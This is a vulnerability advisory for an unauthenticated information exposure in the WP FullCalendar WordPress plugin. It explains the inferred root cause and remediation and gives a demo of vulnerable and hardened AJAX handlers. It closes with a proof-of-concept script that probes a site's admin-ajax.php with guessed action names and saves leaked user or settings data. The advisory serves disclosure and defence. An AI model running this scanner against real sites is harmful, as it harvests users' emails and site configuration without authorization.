Atomic Edge analysis of CVE-2026-24523 (metadata-based):
This vulnerability is an unauthenticated information exposure flaw in the WP FullCalendar WordPress plugin, affecting all versions up to and including 1.6. An attacker with no credentials can retrieve data the plugin should not hand to anonymous visitors. The CVSS score of 5.3 (Medium) corresponds to a network-reachable attack of low complexity that needs no privileges and no user interaction, with a limited confidentiality impact and no effect on integrity or availability.
Atomic Edge research indicates the root cause is most likely an AJAX endpoint or REST API route registered by the plugin without a proper capability check. The CWE-200 classification (Exposure of Sensitive Information to an Unauthorized Actor) is consistent with that reading. No code diff is available, so this conclusion is inferred from the vulnerability description and from common WordPress plugin patterns: a handler hooked on `wp_ajax_nopriv_{action}` (the registration that makes an admin-ajax.php action reachable without a session), or a REST route registered with `'permission_callback' => '__return_true'`, that reads user or site configuration data from the database and omits an `is_user_logged_in()` or `current_user_can()` check before returning it.
Exploitation would involve sending a crafted HTTP request to the plugin's AJAX handler. The attacker targets `/wp-admin/admin-ajax.php` with a POST or GET request whose `action` parameter names the vulnerable plugin function. The action names used in the proof of concept below (`wpfc_ajax`, `wpfc_get_events`, and similar) are guesses derived from the plugin slug, not names confirmed from the plugin source. The request carries no authentication cookies and no nonce. If the handler is registered for unauthenticated callers, the server responds with the data, which may include user emails, display names, or plugin settings, depending on what the handler reads. A response consisting only of `0` means WordPress found no `wp_ajax_nopriv_` handler for that action and nothing plugin-specific ran.
Remediation requires the plugin developer to add authorization checks to every data-returning endpoint. The fix must verify that the requesting user holds an appropriate capability before any data retrieval, typically `if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error( null, 403 ); }` (or `wp_die()`), and a handler that serves only administrators should not be registered on the `wp_ajax_nopriv_` hook at all. For endpoints that are intentionally public, the output must be limited to an explicit allowlist of non-sensitive fields rather than the raw user or option records. A nonce check, while beneficial for CSRF protection, does not address the core authorization flaw: a nonce embedded in a public page is available to any visitor, so it proves intent, not permission.
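As an added example (not WP FullCalendar's code and not the actual fix), the following PHP shows the pattern inferred as the root cause above beside the hardened forms described under remediation. Every `wpfc_demo_*` name, the `wpfc_demo_settings` option key, and the sample rows are hypothetical. When run with the PHP CLI outside WordPress, small stubs stand in for the WordPress API so the three simulated dispatches at the bottom can be observed; inside WordPress the stubs and the dispatches are skipped.

```php
<?php
/**
 * Added example, not WP FullCalendar's code: the unauthenticated admin-ajax
 * pattern this analysis infers, beside a hardened version. All wpfc_demo_*
 * names, the 'wpfc_demo_settings' option key and the sample rows are
 * hypothetical / constructed.
 */

// Stubs so `php wpfc_demo.php` runs outside WordPress. Inside WordPress these
// functions already exist and this block is skipped.
if ( ! function_exists( 'add_action' ) ) {
    $GLOBALS['wpfc_demo_hooks'] = array();
    function add_action( $hook, $cb ) { $GLOBALS['wpfc_demo_hooks'][ $hook ] = $cb; }
    function has_action( $hook ) { return isset( $GLOBALS['wpfc_demo_hooks'][ $hook ] ); }
    function do_action( $hook ) { call_user_func( $GLOBALS['wpfc_demo_hooks'][ $hook ] ); }
    function is_user_logged_in() { return false; }                 // anonymous caller
    function current_user_can( $cap ) { return false; }
    function check_ajax_referer( $action, $arg = false ) { return 1; }
    function get_users( $args = array() ) {                         // constructed sample row
        return array( array( 'ID' => 1, 'user_login' => 'admin', 'user_email' => 'admin@example.com' ) );
    }
    function get_option( $key, $default = false ) {                 // constructed sample settings
        return array( 'api_key' => 'demo-key-000', 'notify_email' => 'owner@example.com' );
    }
    function wp_send_json( $data, $code = 200 ) { echo "HTTP {$code} ", json_encode( $data ), "\n"; }
    function wp_send_json_error( $data = null, $code = 200 ) {
        wp_send_json( array( 'success' => false, 'data' => $data ), $code );
    }
}

// --- Inferred vulnerable pattern --------------------------------------------
// Hooking the handler on wp_ajax_nopriv_* makes it reachable without a session,
// and nothing inside it checks who is asking.
add_action( 'wp_ajax_wpfc_demo_users',        'wpfc_demo_users_vuln' );
add_action( 'wp_ajax_nopriv_wpfc_demo_users', 'wpfc_demo_users_vuln' );
function wpfc_demo_users_vuln() {
    wp_send_json( array(
        'users'    => get_users( array( 'fields' => array( 'ID', 'user_login', 'user_email' ) ) ),
        'settings' => get_option( 'wpfc_demo_settings', array() ),
    ) );
}

// --- Hardened: privileged data ----------------------------------------------
// No nopriv registration, so admin-ajax.php rejects anonymous callers before the
// handler runs; the capability check is what actually authorizes.
add_action( 'wp_ajax_wpfc_demo_users_fixed', 'wpfc_demo_users_fixed' );
function wpfc_demo_users_fixed() {
    check_ajax_referer( 'wpfc_demo_nonce', 'nonce' );   // CSRF protection only
    if ( ! current_user_can( 'list_users' ) ) {          // authorization
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
        return;
    }
    wp_send_json( array( 'users' => get_users( array( 'fields' => array( 'ID', 'display_name' ) ) ) ) );
}

// --- Hardened: intentionally public data, allowlisted fields ------------------
// A calendar feed can stay nopriv, but it copies out only the fields the widget
// needs instead of echoing raw rows (which here carry an author e-mail).
function wpfc_demo_public_event_fields( array $row ) {
    return array(
        'id'    => (int) $row['ID'],
        'title' => (string) $row['post_title'],
        'start' => (string) $row['start'],
    );
}
add_action( 'wp_ajax_wpfc_demo_events',        'wpfc_demo_events_public' );
add_action( 'wp_ajax_nopriv_wpfc_demo_events', 'wpfc_demo_events_public' );
function wpfc_demo_events_public() {
    // Constructed sample; in a real plugin this comes from get_posts() or a custom table.
    $rows = array(
        array( 'ID' => 7, 'post_title' => 'Launch', 'start' => '2026-03-01', 'author_email' => 'owner@example.com' ),
    );
    wp_send_json( array_map( 'wpfc_demo_public_event_fields', $rows ) );
}

// --- Mimic admin-ajax.php dispatch for an anonymous request ------------------
function wpfc_demo_dispatch( $action ) {
    $hook = is_user_logged_in() ? "wp_ajax_{$action}" : "wp_ajax_nopriv_{$action}";
    if ( ! has_action( $hook ) ) {
        echo "HTTP 400 0   (no {$hook} handler; what core returns for unknown actions)\n";
        return;
    }
    do_action( $hook );
}
if ( ! defined( 'ABSPATH' ) ) {   // only when run from the CLI, never inside WordPress
    wpfc_demo_dispatch( 'wpfc_demo_users' );        // leaks users and settings
    wpfc_demo_dispatch( 'wpfc_demo_users_fixed' );  // HTTP 400 0: not reachable anonymously
    wpfc_demo_dispatch( 'wpfc_demo_events' );       // only id/title/start
}
```

Running `php wpfc_demo.php` prints the leaked user row and settings for the first dispatch, the core `0` response for the second (the fixed handler has no nopriv hook, so anonymous callers never reach the capability check), and a three-field event for the third. The `return` after `wp_send_json_error()` is redundant inside WordPress, where that call terminates the request, but keeps the stubbed version honest.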
The impact of successful exploitation is the disclosure of sensitive information. Attackers can harvest user data (emails, display names, and possibly login names) or internal configuration details. Harvested account names and addresses feed targeted phishing and social engineering, and give credential-stuffing or password-spraying attempts against `wp-login.php` a valid user list to work from; exposed settings may reveal integrations or keys that inform further attacks against the site. While the vulnerability does not permit direct modification or code execution, the exposed information represents a significant privacy violation and security risk.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24523 - FullCalendar <= 1.6 - Unauthenticated Information Exposure
/**
 * Proof of Concept for CVE-2026-24523.
 * This script probes for an unauthenticated information disclosure in the
 * WP FullCalendar plugin (<= v1.6).
 * Assumptions: the vulnerable endpoint is an admin-ajax.php handler registered
 * on a wp_ajax_nopriv_ hook. The action names below are inferred from common
 * plugin patterns, not taken from the plugin source. The response may be JSON
 * or HTML.
 */
$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
// Candidate AJAX action names for the 'wp-fullcalendar' plugin. These are
// guesses derived from the plugin slug, not names confirmed from the source.
$potential_actions = [
    'wpfc_ajax',
    'wpfc_get_events',
    'wpfc_fullcalendar',
    'fullcalendar_ajax',
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only (self-signed lab certificates)
foreach ($potential_actions as $action) {
    echo "[*] Testing action: {$action}\n";
    // POST with no cookies and no nonce: this is the unauthenticated path, so
    // only a handler registered on wp_ajax_nopriv_{$action} can answer.
    // Some endpoints may accept GET instead.
    $post_data = ['action' => $action];
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    $response = curl_exec($ch);
    if ($response === false) {
        echo "[-] cURL error: " . curl_error($ch) . "\n\n";
        continue;
    }
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    // admin-ajax.php answers unknown actions with the bare body "0" (HTTP 400 on
    // current WordPress); a handler that ran and fell through also ends in "0".
    if (trim($response) === '0') {
        echo "[-] No unauthenticated handler for this action (HTTP {$http_code})\n\n";
        continue;
    }
    if ($http_code == 200 && !empty($response)) {
        // Crude heuristic: look for field names that suggest user or config data.
        if (preg_match('/email|user|admin|config|setting|option/i', $response)) {
            echo "[!] POTENTIAL SUCCESS with action: {$action}\n";
            echo "[!] Response preview (first 500 chars): " . substr($response, 0, 500) . "\n\n";
            // Save the full response to a file for manual analysis.
            file_put_contents('cve_2026_24523_response_' . $action . '.txt', $response);
        } else {
            echo "[+] Received 200 response, but no obvious sensitive data patterns.\n";
            echo "[+] Response: " . substr($response, 0, 200) . "\n\n";
        }
    } else {
        echo "[-] Request failed or returned HTTP {$http_code}\n\n";
    }
}
curl_close($ch);
echo "[+] PoC scan complete.\n";